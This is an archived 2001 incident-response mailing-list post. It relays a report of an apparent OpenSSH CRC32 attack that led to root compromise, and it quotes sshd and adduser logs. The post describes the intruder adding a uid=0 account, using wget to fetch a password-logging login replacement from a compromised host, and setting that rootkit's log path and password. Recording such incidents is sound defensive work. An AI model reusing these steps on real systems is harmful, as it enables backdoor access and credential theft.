I stumbeled over this post at openssh-unix-dev mailinglist last week - http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2 The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for RedHat 7.0) up and running when he received what looks to be a CRC32-attack. A few minutes later you can see (he posted parts of the logfile) a new user being created with uid=0 and then how an connection is made from system in Israel. There has been no confirmation about what he writes but I recieved the following mail as an answer of my questions. ------ Message ------ I posted an openssh security alert earlier today and already got some responses. Thanks for everything. Instead of replying to everyone individually I composed the details of the attack. +++ It does not look like a job of worms. Snort did not detect mass port scan from attacker's ip address. It seems that he (I assumed, so I don't have to type he/she all the way) just wants to gain access through openssh. The server is running Red Hat 7.0. With all packages up to date. The following daemons are running: wu-ftpd, apache, telnet, openssh, named I never access the system via telnet, it is there just for backup purpose. > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: > > network attack detected > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on > > input. > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on > > input. > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on > > input. > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as) > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528 > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, > > home=/home/mattanl, shell=/bin/bash > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529 > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, > > home=/home/mattan, shell=/bin/bash After the attacker gained root access. He created two users mattan and mattanl. He then downloaded a package: wget http://home.dal.net/resolve/login.tgz. The target site has been compromised. (hacked by a hacker group in Israel) This is a login replacement package, it logs the user id and passwords. He modified rk.h to: #define MY_LOGFILE "/dev/ttypz" #define MY_PASSWORD "1245890" After he complied and installed the login replacement. Something went wrong. /bin/login was zero bytes in length. So when he came back using telnet, he was denied of access. I also disabled sshd and kept one session open for remote control after found login was replaced. I md5 checked the system against a good backup, nothing else was altered. I will try to sniff all packets come to my this server on ssh port. If he attempts to crack the server again, I will have more details. But I guess I will have to turn the server back on. Thanks for all you time ------ End of message ------ I had some further questions so I mailed the guy once again but has not recieved any answer. So, to he main question. Has anyone else had a system compromised by the CRC32-attack when running a version of sshd that is believed to be secure? OpenSSH-2.3.0 or later, SSH 1.2.32 or later. /Johan Augustsson -------------------------------------------------------------------- Johan Augustsson Phone: +46 (0)31 773 1000 Incident Response Team Fax: +46 (0)31 773 1087 Göteborg University E-mail: Johan.Augustssonat_private Sweden -------------------------------------------------------------------- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 10:35:14 PST